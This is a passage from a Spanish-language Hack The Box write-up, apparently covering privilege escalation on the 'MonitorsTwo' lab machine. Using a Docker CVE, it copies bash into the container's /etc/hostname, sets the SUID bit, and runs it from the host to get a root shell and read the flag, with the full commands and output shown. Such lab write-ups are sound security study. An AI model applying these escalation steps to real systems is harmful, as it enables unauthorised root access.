2023/05/02 01:06:07 ASLR is enabled.

[  Information Gathering - Cgroups  ]
2023/05/02 01:06:07 /proc/1/cgroup file content:
    12:rdma:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    11:freezer:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    10:memory:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    9:net_cls,net_prio:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    8:blkio:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    7:cpu,cpuacct:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    6:perf_event:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    5:pids:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    4:hugetlb:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    3:devices:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    2:cpuset:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    1:name=systemd:/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
    0::/docker/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e
2023/05/02 01:06:07 /proc/self/cgroup file added content (compare pid 1) :

Entre la informacion recabada destacamos:

  • Los Mounts, vemos que el archivo entrypoint.sh esta en /root/cacti/. Y tres archivos de /etc/ estan dentro de la carpeta /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/.
1
2
3
4

8:2 /root/cacti/entrypoint.sh /entrypoint.sh rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname /etc/hostname rw,relatime - ext4 /dev/sda2 rw
8:2 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts /etc/hosts rw,relatime - ext4 /dev/sda2 rw
  • Con lo anterior tambien destacamos el ID completo del contenedor.

Con la informacion que encontramos podemos seguir con la explicacion del CVE, donde citamos otra parte de la explicacion.

When containers included executable programs with extended permission bits (such as setuid), unprivileged Linux users could discover and execute those programs. ..

Ahora con el ID del contenedor ya podemos ver ciertos archivos, aunque unicamente tres: resolv.conf, hostname y hosts.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

marcus@monitorstwo:~$ ls -lah /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
-rw-r--r-- 1 root root 174 May  4 00:28 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
marcus@monitorstwo:~$ cat /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
127.0.0.1   localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.19.0.3  50bca5e748b0
marcus@monitorstwo:~$

Si realizamos un cambio al archivo /etc/hosts en el contenedor.

1
2
3
4

# container
chmod 777 /etc/hosts
ls -lah /etc/hosts
-rwxrwxrwx 1 root root 174 May  4 00:28 /etc/hosts

Vemos el cambio reflejado en el host.

1
2
3
4

# host
marcus@monitorstwo:~$ ls -lah /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
-rwxrwxrwx 1 root root 174 May  4 00:28 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hosts
marcus@monitorstwo:~$

Tomando en cuenta lo anterior, modificamos el archivo /etc/hostname, realizando una copia de bash a este, que, finalmente le dimos los permisos SUID.

1
2
3
4
5

cp /bin/bash /etc/hostname
chmod +x /etc/hostname
chmod u+s /etc/hostname
file /etc/hostname
/etc/hostname: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=31c321f9f0c1f86a379f7efaaeb75f707998f27f, for GNU/Linux 3.2.0, stripped

Como podemos observar el usuario marcus puede ver el cambio realizado con los permisos dados.

1
2
3
4
5

marcus@monitorstwo:~$ ls -lah /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname
-rwsr-xr-x 1 root root 1.2M May  4 01:25 /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname
marcus@monitorstwo:~$ file /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname
/var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=31c321f9f0c1f86a379f7efaaeb75f707998f27f, for GNU/Linux 3.2.0, stripped
marcus@monitorstwo:~$

Y como se explicaba en el CVE, un usuario de bajo nivel puede ejecutar estos programas, en este caso ejecutamos bash con la flag -p (GTFOBins) lo que nos permitiria obtener una shell como root, y, nuestra flag root.txt.

1
2
3
4
5
6
7
8
9

marcus@monitorstwo:~$ /var/lib/docker/containers/50bca5e748b0e547d000ecb8a4f889ee644a92f743e129e52f7a37af6c62e51e/hostname -p
hostname-5.1# id
uid=1000(marcus) gid=1000(marcus) euid=0(root) egid=0(root) groups=0(root),1000(marcus)
hostname-5.1# cd /root
hostname-5.1# ls
cacti  root.txt
hostname-5.1# cat root.txt
ade2fb8718fc0bbc33cdccebd0057c04
hostname-5.1#

En resumen:

  • Debemos de obtener el ID completo del contenedor, con ello podemos descubrir el directorio del mismo en el host bajo el directorio /var/lib/docker/containers/.
  • Con lo anterior, modificamos un archivo que es accesible para el host, en este caso hostname el cual podemos modificar dentro del contenedor.
  • Al poder modificar un archivo accesible por el host, podemos darle permisos SUID para que el host pueda ejecutar y escalar privilegios.
Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HTB: MonitorsTwo